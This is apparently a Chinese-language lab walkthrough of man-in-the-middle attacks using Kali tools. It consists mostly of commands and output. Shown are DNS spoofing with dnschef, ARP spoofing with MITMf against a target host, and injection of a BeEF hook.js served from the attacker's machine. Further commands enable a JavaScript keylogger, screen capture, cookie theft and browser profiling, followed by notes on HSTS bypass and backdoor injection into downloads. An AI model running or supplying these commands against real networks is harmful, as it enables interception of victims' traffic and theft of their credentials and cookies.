密码嗅探
DNS欺骗代理
- dnschef --fakeip=1.1.1.10 --
fakedomains=, --interface 1.1.1.2
-q
将被害者DNS指向伪造的DNS服务器
root@k:~# dnschef --fakeip=192.168.1.1 --fakedomains=, --interface 192.168.1.110 -q
[+] DNSChef started on interface: 192.168.1.110
[+] Using the following nameservers: 8.8.8.8
[+] Cooking A replies to point to 192.168.1.1 matching:
[+] Cooking A replies to point to 192.168.1.1 matching: ,www,
root@k:~# netstat -pantu | grep :53
udp 0 0 192.168.1.110:53 0.0.0.0:* 2073/python
把win7的DNS地址改为: 192.168.1.110
wireshark Network Analyzer
host 192.168.1.111
root@k:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libipeq-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
root@k:~# apt-get install mitmf
root@k:~# pip uninstall twisted
root@k:~# wget /Release/Twisted/15.5/Twisted-15.5.0.tar.bz2
root@k:~# pip install ./Twisted-15.5.0.tar.bz2
root@k:~# mitmf
root@k:~# cd /usr/share/beef-xss/
root@k:/usr/share/beef-xss# ls
arerules beef beef_cert.pem beef_key.pem config.yaml core db extensions Gemfile Gemfile.lock modules
root@k:/usr/share/beef-xss# ./beef
root@k:/usr/share/beef-xss# openvas-stop
Stopping Openvas Services
root@k:/usr/share/beef-xss# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http://192.168.1.110:3000/hook.js
[+] MITMF v0.9.8 - 'The Dark Side'
|_ Inject v0.4
|_ Spoof v0.6
| |_ ARP spoofing enabled
|
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMF-API online
* Running on http://127.0.0.1:9999/ (Press CTPL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online
root@k:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --jskeylogger
//键盘记录
root@k:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --upsidedownternet
//图片转180度
root@k:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --screen
//抓取图片
root@k:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --ferretng
//抓取cookie
root@k:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --browserprofiler
//浏览器及插件信息
中间人攻击
--hsts
- HTTP Strict Transport Security
-防止协议降级、cookie窃取
-安全策略通过HTTP响应头" Strict-Transport-Security "实施
-限制user-agent、https等
--filepwn
-凌空插后门